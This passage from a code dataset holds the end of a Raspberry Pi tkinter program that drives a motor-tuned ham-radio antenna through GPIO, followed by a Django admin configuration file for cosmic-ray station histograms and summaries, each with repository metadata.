ttk.Combobox(width=19, font=('Helvetica', 14),\n state='readonly')\n self.preset_combobox.grid(row=7, column=1, sticky=NW)\n self.preset_combobox.bind(\"<>\", self.get_preset_val)\n \n self.ini_test () # Check for ini file existence\n self.ini_read() # Retrieve ini file settings \n self.gpioconfig() # Set up GPIO for antenna control\n \n return\n \n def raise_button_press(self, _unused):\n self.motor_stalled = 0\n self.motor_up ()\n \n def lower_button_press(self, _unused):\n self.motor_stalled = 0\n self.motor_down ()\n \n def RL_button_release(self, _unused):\n self.motor_stop ()\n self.status_message.set (\"Ready\")\n \n def preset_button_press(self, _unused):\n self.motor_stalled = 0\n self.motor_move()\n \n def confirm_newini(self):\n okay = messagebox.askokcancel('RPiAntDrv',\n 'Overwrite Configuration File?',\n detail='This will overwrite the '\n 'RPiAntDrv.ini file with default '\n 'values.', icon='question')\n if okay:\n # Overwrite the ini file and refresh values\n self.ini_new()\n self.ini_read()\n self.status_message.set (\"RPiAntDrv.ini written\")\n else:\n self.status_message.set (\"Operation cancelled\")\n \n def confirm_sync(self):\n okay = messagebox.askokcancel('RPiAntDrv',\n 'Proceed with Sync?',\n detail='This will sychronize the '\n 'antenna encoder count to the preset '\n 'value selected.', icon='question')\n if okay:\n # Sychronize encoder count with current preset value\n self.encoder_count.set(self.ant_preset_val)\n self.status_message.set (\"Encoder syncronized\")\n else:\n self.status_message.set (\"Encoder sync canceled\")\n \n def motor_up(self):\n # We can change speed on the fly\n self.pwm_set.ChangeDutyCycle(self.pwm_duty)\n # If motor is not already running and in correct direction\n if not(self.motor_running and self.antenna_raising):\n # check reverse motor lead flag\n GPIO.output(self.dir1_pin, GPIO.HIGH) # Run motor FWD\n GPIO.output(self.dir2_pin, GPIO.LOW)\n self.antenna_raising = 1\n self.motor_running = 1\n # Initialize stall counter and start stall timer\n self.motor_stall()\n \n def motor_down(self):\n # We can change speed on the fly\n self.pwm_set.ChangeDutyCycle(self.pwm_duty)\n # If motor is not running and in correct direction\n if not(self.motor_running and not self.antenna_raising):\n GPIO.output(self.dir1_pin, GPIO.LOW) # Run motor\n GPIO.output(self.dir2_pin, GPIO.HIGH)\n self.motor_running = 1\n self.antenna_raising = 0\n # Initialize stall detection\n self.motor_stall()\n \n def motor_stop(self):\n GPIO.output(self.dir1_pin, GPIO.LOW) # Stop motor\n GPIO.output(self.dir2_pin, GPIO.LOW)\n self.pwm_set.ChangeDutyCycle(0) # Kill PWM\n self.motor_running = 0\n #self.ini_update()\n\n def motor_stall(self):\n # Set stall period proportional to motor speed\n self.stall_period = int((100 / self.duty_scale.get())* self.stall_time)\n # If motor is still running, perform stall check\n if (self.motor_running):\n # If stall detection is not already active\n if not(self.stall_active):\n self.stall_count = self.encoder_count.get()\n self.stall_active = 1\n self.master.after(self.stall_period, self.motor_stall)\n # Otherwise see if we stalled\n elif (self.stall_count == self.encoder_count.get()):\n self.motor_stalled = 1\n self.motor_stop()\n self.stall_active = 0\n self.status_message.set (\"! Antenna Stalled !\")\n # Else reset stall count and timer\n else:\n self.stall_count = self.encoder_count.get()\n self.master.after(self.stall_period, self.motor_stall)\n else:\n self.stall_active = 0\n \n def motor_move(self):\n # If motor is stalled, exit\n if (self.motor_stalled == 1):\n return\n # If encoder count = preset, stop and exit\n if self.encoder_count.get() == (self.ant_preset_val):\n self.motor_stop()\n self.status_message.set (\"We have arrived\")\n return\n # If encoder count within 5 counts of preset, slow down\n Lval= (self.ant_preset_val -5)\n Hval= (self.ant_preset_val +6)\n if self.encoder_count.get() in range(Lval, Hval):\n self.status_message.set (\"Slowing down\")\n self.duty_scale.set(self.slow_speed)\n # Else run full speed \n else:\n self.status_message.set (\"Full speed\")\n self.duty_scale.set(self.full_speed)\n \n # If encoder count > preset drive antenna down\n if self.encoder_count.get() > (self.ant_preset_val):\n self.motor_down()\n # Else drive antenna up\n else:\n self.motor_up()\n # after 100mS, call this function again\n self.master.after(100, self.motor_move)\n \n def get_antenna_val(self, _unused):\n # fetch new antenna configuration and presets\n config = configparser.ConfigParser()\n config.read (self.ini_path)\n self.last_antenna = self.antenna_combobox.get()\n self.ant_refresh(config)\n self.pwm_set.ChangeFrequency(self.pwm_freq)\n \n def get_preset_val(self, _unused):\n # get the preset value stored in the ini file\n config = configparser.ConfigParser()\n config.read (self.ini_path)\n self.ant_preset_val = (config.getint(self.ant_preset_sect,\n self.preset_combobox.get()))\n #print (self.ant_preset_val)\n \n def update_pwm_duty(self, _unused):\n self.pwm_duty = self.duty_scale.get()\n #print (_unused)\n \n def gpioconfig(self): # Configure GPIO pins\n GPIO.setwarnings(False)\n GPIO.cleanup() # In case user changes running configuration\n \n GPIO.setmode(GPIO.BOARD) # Refer to IO as Board header pins\n GPIO.setup(self.dir1_pin, GPIO.OUT) # Direction output 1 to H-bridge\n GPIO.setup(self.dir2_pin, GPIO.OUT) # Direction output 2 to H-bridge\n GPIO.output(self.dir1_pin, GPIO.LOW) # Turn direction output 1 off\n GPIO.output(self.dir2_pin, GPIO.LOW) # Turn direction output 2 off\n GPIO.setup(self.pwm_pin, GPIO.OUT) # PWM output to H-bridge\n # Set up the simple encoder switch input and add de-bounce time in mS\n # GPIO.RISING interrupts on both edges, GPIO.FALLING seems better behaved\n GPIO.setup(self.encoder_pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n GPIO.add_event_detect(self.encoder_pin, GPIO.FALLING,\n bouncetime=40, callback=self.encoder_ISR)\n # Note GPIO.PWM is software not hardware PWM\n self.pwm_set = GPIO.PWM(self.pwm_pin, self.pwm_freq) # Set up PWM for use\n #self.pwm_set.stop() # Stop pwm output\n self.pwm_set.start(self.pwm_duty) # Start pwm output at 0%\n \n GPIO.setwarnings(True)\n \n def encoder_ISR(self, _channel):\n # Do as little as possible in the ISR, get in and get out!\n # Increment the encoder count and jump out\n if self.antenna_raising == 1:\n self.encoder_count.set (self.encoder_count.get()+1)\n else:\n self.encoder_count.set (self.encoder_count.get()-1)\n \n def ini_new(self): # Set up an ini file if it does not exist\n # Configuration file parser to read and write ini file\n config = configparser.ConfigParser()\n # User configurable program settings\n config['Settings'] = {'pwm_pin':'19',\n 'dir1_pin':'13',\n 'dir2_pin':'15',\n 'encoder_pin':'11',\n 'antennas':'Antenna 1, Antenna 2', \n 'last_position':'0',\n 'last_antenna':'Antenna 1',\n 'last_preset':'20m 14.400 (037)'}\n \n # Set up default antennas\n config['Antenna 1_Config'] = {'pwm_freq':'4000',\n 'full_speed':'100',\n 'slow_speed':'25',\n 'stall_time':'250'}\n \n config['Antenna 1_Preset'] = {'maximum (270)':'270',\n '80m _3.500 (226)':'226',\n '80m _3.580 (221)':'221',\n '80m _3.800 (206)':'206',\n '80m _3.900 (199)':'199',\n '80m _4.000 (192)':'192',\n '60m _5.300 (130)':'130',\n '60m _5.400 (127)':'127',\n '40m _7.035 (091)':'91',\n '40m _7.175 (089)':'89',\n '40m _7.300 (087)':'87',\n '30m 10.000 (056)':'56',\n '30m 10.100 (055)':'55',\n '30m 10.200 (054)':'54',\n '20m 14.000 (039)':'39',\n '20m 14.200 (038)':'38',\n '20m 14.400 (037)':'37',\n '15m 21.275 (019)':'19',\n '12m 24.930 (014)':'14',\n '10m 28.000 (008)':'8',\n '10m 29.700 (006)':'6',\n 'minimum (000)':'0'} \n \n config['Antenna 2_Config'] = {'pwm_freq':'4000',\n 'full_speed':'95',\n 'slow_speed':'20',\n 'stall_time':'250'}\n \n config['Antenna 2_Preset'] = {'maximum (270)':'270',\n '80m _3.700 (200)':'200',\n '60m _5.350 (129)':'129',\n '40m _7.250 (090)':'90',\n '30m 10.100 (055)':'55',\n '20m 14.200 (038)':'38',\n 'minimum (000)':'0'}\n \n # Save the default configuration file\n with open(self.ini_path, 'w') as configfile:\n config.write(configfile)\n \n def ini_test(self):\n # Test to see if configuration file exists\n try:\n with open(self.ini_path) as _file:\n # pass condition\n self.status_message.set (\"Configuration file loaded\")\n except IOError as _e:\n #Does not exist OR no read permissions\n self.status_message.set (\"Configuration file created\")\n self.ini_new ()\n \n def ini_read(self):\n # Read ini file and set up parameters\n config = configparser.ConfigParser()\n config.read (self.ini_path)\n # Retrieve I/O pin assignments\n self.pwm_pin = (config.getint ('Settings','pwm_pin',fallback=19))\n self.dir1_pin = (config.getint ('Settings','dir1_pin',fallback=13))\n self.dir2_pin = (config.getint ('Settings','dir2_pin',fallback=15))\n self.encoder_pin = (config.getint ('Settings','encoder_pin',fallback=11))\n # Restore the encoder count to preset value\n self.encoder_count.set (config.getint('Settings','last_position',fallback=0))\n self.ant_preset_val = self.encoder_count.get() \n # Retrieve the last antenna used and restore saved state\n # Grab CSV list of antennas to act as combobox values and keys\n # The .strip method removes leading and trailing spaces from .split list\n _antennas = (config.get('Settings','antennas',fallback=\"Antenna 1\"))\n self.antenna_combobox['values']=[item.strip() for item in _antennas.split(',')] \n self.last_antenna = (config.get('Settings','last_antenna',fallback=\"Antenna 1\"))\n self.antenna_combobox.set(self.last_antenna)\n self.preset_combobox.set(config.get('Settings','last_preset',fallback='None'))\n \n # refresh antenna settings and presets\n self.ant_refresh(config)\n \n def ant_refresh (self,config):\n # Using selected antenna refresh antenna settings and presets\n self.ant_config_sect = (self.last_antenna + '_Config')\n self.ant_preset_sect = (self.last_antenna + '_Preset')\n self.pwm_freq = (config.getint (self.ant_config_sect,'pwm_freq',fallback=4000))\n self.full_speed = (config.getint (self.ant_config_sect,'full_speed',fallback=100))\n self.slow_speed = (config.getint (self.ant_config_sect,'slow_speed',fallback=25))\n self.stall_time = (config.getint (self.ant_config_sect,'stall_time',fallback=250))\n self.preset_combobox['values']=(config.options(self.ant_preset_sect))\n \n def ini_update(self):\n config = configparser.ConfigParser()\n # Perform read-modify-write of ini file\n # Note: Anytyhing written must be a string value\n config.read (self.ini_path)\n config.set ('Settings','last_position',str(self.encoder_count.get()))\n config.set ('Settings','last_antenna',self.antenna_combobox.get())\n config.set ('Settings','last_preset',self.preset_combobox.get()) \n # Save modified configuration file\n with open(self.ini_path, 'w') as configfile:\n config.write(configfile)\n self.status_message.set (\"ini file updated\")\n \n def close(self): # Cleanly close the GUI and cleanup the GPIO\n self.ini_update() # Save current settings\n GPIO.cleanup()\n #print (\"GPIO cleanup executed\") \n self.master.destroy()\n #print (\"master window destroyed\")\n \n def about(self):\n popup = Toplevel()\n popup.title(\"About RPiAntDrv\")\n popup.geometry(\"325x225+162+168\")\n popup.configure(bg= 'snow')\n \n popup_text1 = Label(popup, text='RPiAntDrv.py v1.6',\n font = ('Helvetica', 12), wraplength=300, justify=LEFT,\n bg = 'snow', fg='black', padx=10, pady=10)\n popup_text1.grid(row=0, column=0, columnspan=1)\n \n popup_text2 = Label(popup, text='This Python script is used to control '\n 'a motor tuned antenna like a screwdriver antenna or '\n 'tuned loop. Feedback from the antenna is provided by '\n 'a simple dry contact or pulse output relative to the '\n 'output shaft turning.',\n font = ('Helvetica', 12), wraplength=300, justify=LEFT,\n bg = 'snow', fg='black', padx=10, pady=10)\n popup_text2.grid(row=1, column=0, columnspan=1)\n \n popup.mainloop()\n \ndef main():\n \n # root window created. Here, that would be the only window, but\n # you can later have windows within windows.\n root = Tk()\n app = Window(root) #creation of an instance\n root.protocol(\"WM_DELETE_WINDOW\", app.close) # cleanup GPIO when X closes window\n root.mainloop() # Loops forever\n \nif __name__ == '__main__':\n main()\n ", "repo_name": "N7IFC/RPi_Antenna_Driver", "sub_path": "RPiAntDrv.py", "file_name": "RPiAntDrv.py", "file_ext": "py", "file_size_in_byte": 23504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tkinter.Frame", "line_number": 21, "usage_type": "name"}, {"api_name": "tkinter.Frame.__init__", "line_number": 26, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 26, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 32, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 41, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 53, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 67, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 69, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 77, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 83, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 87, "usage_type": "call"}, {"api_name": "tkinter.S", "line_number": 89, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 91, "usage_type": "call"}, {"api_name": "tkinter.SW", "line_number": 93, "usage_type": "name"}, {"api_name": "tkinter.LEFT", "line_number": 93, "usage_type": "name"}, {"api_name": "tkinter.SW", "line_number": 94, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 96, "usage_type": "call"}, {"api_name": "tkinter.NW", "line_number": 97, "usage_type": "name"}, {"api_name": "tkinter.NW", "line_number": 99, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 101, "usage_type": "call"}, {"api_name": "tkinter.SW", "line_number": 103, "usage_type": "name"}, {"api_name": "tkinter.LEFT", "line_number": 103, "usage_type": "name"}, {"api_name": "tkinter.S", "line_number": 104, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 106, "usage_type": "call"}, {"api_name": "tkinter.SW", "line_number": 108, "usage_type": "name"}, {"api_name": "tkinter.LEFT", "line_number": 108, "usage_type": "name"}, {"api_name": "tkinter.S", "line_number": 109, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 111, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 113, "usage_type": "name"}, {"api_name": "tkinter.LEFT", "line_number": 113, "usage_type": "name"}, {"api_name": "tkinter.S", "line_number": 114, "usage_type": "name"}, {"api_name": "tkinter.Button", "line_number": 116, "usage_type": "call"}, {"api_name": "tkinter.RAISED", "line_number": 116, "usage_type": "name"}, {"api_name": "tkinter.Button", "line_number": 122, "usage_type": "call"}, {"api_name": "tkinter.RAISED", "line_number": 122, "usage_type": "name"}, {"api_name": "tkinter.Button", "line_number": 128, "usage_type": "call"}, {"api_name": "tkinter.RAISED", "line_number": 128, "usage_type": "name"}, {"api_name": "tkinter.Scale", "line_number": 133, "usage_type": "call"}, {"api_name": "tkinter.HORIZONTAL", "line_number": 133, "usage_type": "name"}, {"api_name": "tkinter.NW", "line_number": 136, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 139, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 139, "usage_type": "name"}, {"api_name": "tkinter.NW", "line_number": 141, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 145, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 145, "usage_type": "name"}, {"api_name": "tkinter.NW", "line_number": 147, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askokcancel", "line_number": 173, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 173, "usage_type": "name"}, {"api_name": "tkinter.messagebox.askokcancel", "line_number": 187, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 187, "usage_type": "name"}, {"api_name": "RPi.GPIO.output", "line_number": 205, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 205, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 205, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 206, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 206, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 206, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 217, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 217, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 217, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 218, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 218, "usage_type": "name"}, {"api_name": "RPi.GPIO.HIGH", "line_number": 218, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 225, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 225, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 225, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 226, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 226, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 226, "usage_type": "attribute"}, {"api_name": "configparser.ConfigParser", "line_number": 285, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 293, "usage_type": "call"}, {"api_name": "RPi.GPIO.setwarnings", "line_number": 304, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 304, "usage_type": "name"}, {"api_name": "RPi.GPIO.cleanup", "line_number": 305, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 305, "usage_type": "name"}, {"api_name": "RPi.GPIO.setmode", "line_number": 307, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 307, "usage_type": "name"}, {"api_name": "RPi.GPIO.BOARD", "line_number": 307, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 308, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 308, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 308, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 309, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 309, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 309, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 310, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 310, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 310, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.output", "line_number": 311, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 311, "usage_type": "name"}, {"api_name": "RPi.GPIO.LOW", "line_number": 311, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 312, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 312, "usage_type": "name"}, {"api_name": "RPi.GPIO.OUT", "line_number": 312, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.setup", "line_number": 315, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 315, "usage_type": "name"}, {"api_name": "RPi.GPIO.IN", "line_number": 315, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.PUD_UP", "line_number": 315, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.add_event_detect", "line_number": 316, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 316, "usage_type": "name"}, {"api_name": "RPi.GPIO.FALLING", "line_number": 316, "usage_type": "attribute"}, {"api_name": "RPi.GPIO.PWM", "line_number": 319, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 319, "usage_type": "name"}, {"api_name": "RPi.GPIO.setwarnings", "line_number": 323, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 323, "usage_type": "name"}, {"api_name": "configparser.ConfigParser", "line_number": 335, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 405, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 438, "usage_type": "call"}, {"api_name": "RPi.GPIO.cleanup", "line_number": 452, "usage_type": "call"}, {"api_name": "RPi.GPIO", "line_number": 452, "usage_type": "name"}, {"api_name": "tkinter.Toplevel", "line_number": 458, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 463, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 464, "usage_type": "name"}, {"api_name": "tkinter.Label", "line_number": 468, "usage_type": "call"}, {"api_name": "tkinter.LEFT", "line_number": 473, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 483, "usage_type": "call"}]}
+{"seq_id": "5523461716", "text": "from django.contrib import admin\n\nfrom . import models\n\n\n@admin.register(models.GeneratorState)\nclass GeneratorStateAdmin(admin.ModelAdmin):\n list_display = ('check_last_run', 'check_is_running', 'update_last_run', 'update_is_running')\n\n\n@admin.register(models.NetworkHistogram)\nclass NetworkHistogramAdmin(admin.ModelAdmin):\n list_display = ('network_summary', 'type')\n list_filter = ('type', 'network_summary__date')\n raw_id_fields = ('network_summary',)\n\n\n@admin.register(models.DailyHistogram, models.MultiDailyHistogram, models.DailyDataset, models.MultiDailyDataset)\nclass DailyStationDataAdmin(admin.ModelAdmin):\n list_display = ('summary', 'type')\n list_filter = ('type', 'summary__station__number')\n raw_id_fields = ('summary',)\n\n\nclass DailyHistogramInline(admin.StackedInline):\n model = models.DailyHistogram\n extra = 0\n\n\nclass MultiDailyHistogramInline(admin.StackedInline):\n model = models.MultiDailyHistogram\n extra = 0\n\n\nclass DailyDatasetInline(admin.StackedInline):\n model = models.DailyDataset\n extra = 0\n\n\nclass MultiDailyDatasetInline(admin.StackedInline):\n model = models.MultiDailyDataset\n extra = 0\n\n\nclass NetworkHistogramInline(admin.StackedInline):\n model = models.NetworkHistogram\n extra = 0\n\n\n@admin.register(models.NetworkSummary)\nclass NetworkSummaryAdmin(admin.ModelAdmin):\n list_display = (\n 'date',\n 'needs_update',\n 'needs_update_coincidences',\n 'num_coincidences',\n )\n list_filter = ('needs_update', 'needs_update_coincidences', 'date')\n list_editable = ('needs_update', 'needs_update_coincidences')\n inlines = (NetworkHistogramInline,)\n list_per_page = 200\n actions = ['unset_update_flag', 'unset_coincidences_flag', 'set_update_flag', 'set_coincidences_flag']\n\n def unset_update_flag(self, request, qs):\n qs.update(needs_update=False)\n\n unset_update_flag.short_description = 'Unset needs_update'\n\n def unset_coincidences_flag(self, request, qs):\n qs.update(needs_update_coincidences=False)\n\n unset_coincidences_flag.short_description = 'Unset needs_update_coincidences'\n\n def set_update_flag(self, request, qs):\n qs.update(needs_update=True)\n\n set_update_flag.short_description = 'Set needs_update'\n\n def set_coincidences_flag(self, request, qs):\n \"\"\"Only set flags if num coincidences is not null\"\"\"\n (qs.filter(num_coincidences__isnull=False).update(needs_update_coincidences=True))\n\n set_coincidences_flag.short_description = 'Set needs_update_coincidences'\n\n\n@admin.register(models.Summary)\nclass SummaryAdmin(admin.ModelAdmin):\n list_display = (\n 'station',\n 'date',\n 'num_events',\n 'num_config',\n 'num_errors',\n 'num_weather',\n 'num_singles',\n 'needs_update',\n 'needs_update_events',\n 'needs_update_config',\n 'needs_update_errors',\n 'needs_update_weather',\n 'needs_update_singles',\n )\n list_filter = (\n 'station',\n 'needs_update',\n 'needs_update_events',\n 'needs_update_weather',\n 'needs_update_singles',\n 'needs_update_config',\n 'date',\n )\n list_editable = (\n 'needs_update',\n 'needs_update_events',\n 'needs_update_weather',\n 'needs_update_singles',\n 'needs_update_config',\n )\n inlines = (DailyHistogramInline, MultiDailyHistogramInline, DailyDatasetInline, MultiDailyDatasetInline)\n list_per_page = 200\n actions = [\n 'unset_update_flag',\n 'unset_events_flag',\n 'unset_config_flag',\n 'set_update_flag',\n 'set_events_flag',\n 'set_config_flag',\n ]\n\n def unset_update_flag(self, request, qs):\n qs.update(needs_update=False)\n\n unset_update_flag.short_description = 'Unset needs_update'\n\n def unset_events_flag(self, request, qs):\n qs.update(needs_update_events=False)\n\n unset_events_flag.short_description = 'Unset needs_update_events'\n\n def unset_config_flag(self, request, qs):\n qs.update(needs_update_config=False)\n\n unset_config_flag.short_description = 'Unset needs_update_config'\n\n def set_update_flag(self, request, qs):\n qs.update(needs_update=True)\n\n set_update_flag.short_description = 'Set needs_update'\n\n def set_events_flag(self, request, qs):\n \"\"\"Only set flags if num events is not null\"\"\"\n qs.filter(num_events__isnull=False).update(needs_update_events=True)\n\n set_events_flag.short_description = 'Set needs_update_events'\n\n def set_config_flag(self, request, qs):\n \"\"\"Only set flags if num config is not null\"\"\"\n qs.filter(num_config__isnull=False).update(needs_update_config=True)\n\n set_config_flag.short_description = 'Set needs_update_config'\n\n\n@admin.register(models.Configuration)\nclass ConfigurationAdmin(admin.ModelAdmin):\n list_display = ('station', 'primary', 'secondary', 'timestamp')\n list_filter = ('timestamp', 'summary__station__number')\n raw_id_fields = ('summary',)\n\n\n@admin.register(models.DetectorTimingOffset)\nclass DetectorTimingOffsetAdmin(admin.ModelAdmin):\n list_display = ('summary', 'offset_1', 'offset_2', 'offset_3', 'offset_4')\n list_filter = ('summary__station__number',)\n raw_id_fields = ('summary',)\n\n\n@admin.register(models.StationTimingOffset)\nclass StationTimingOffsetAdmin(admin.ModelAdmin):\n list_display = ('ref_summary', 'summary', 'offset', 'error')\n list_filter = ('ref_summary__station__number', 'summary__station__number', 'ref_summary__date')\n raw_id_fields = ('ref_summary', 'summary')\n\n\nadmin.site.register(models.HistogramType)\nadmin.site.register(models.DatasetType)\n", "repo_name": "HiSPARC/publicdb", "sub_path": "publicdb/histograms/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 5696, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 7, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 11, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 18, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 30, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 35, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 40, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 40, "usage_type": "name"}, {"api_name": "django.contrib.admin.StackedInline", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 45, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 51, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 51, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 50, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 50, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 87, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 87, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 86, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 86, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 164, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 164, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 163, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 163, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 171, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 171, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 170, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 170, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 178, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 178, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 177, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 177, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 184, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 184, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 184, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 185, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 185, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 185, "usage_type": "name"}]}
